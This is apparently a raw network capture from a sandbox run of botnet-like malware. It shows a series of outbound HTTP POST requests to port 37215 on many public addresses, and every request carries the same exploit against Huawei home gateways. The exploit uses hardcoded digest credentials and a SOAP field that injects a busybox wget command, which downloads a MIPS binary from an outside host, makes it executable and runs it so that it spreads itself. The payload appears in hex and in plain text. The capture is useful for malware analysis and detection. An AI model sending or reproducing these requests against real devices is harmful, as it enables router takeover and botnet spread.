2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1254192.168.2.156064841.134.96.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.774163961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1255192.168.2.1532976157.138.205.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.775011063 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1256192.168.2.1551644197.244.188.13037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.776134014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1257192.168.2.1548970197.82.170.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.776989937 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1258192.168.2.153301641.123.177.20737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.777086973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1259192.168.2.1559190160.30.190.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.777143955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1260192.168.2.1543760157.198.66.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.777162075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1261192.168.2.1539126161.4.90.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.777544975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1262192.168.2.1556832206.105.60.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.756513119 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1263192.168.2.1551834123.205.202.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.756534100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1264192.168.2.1556368157.56.87.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.756558895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
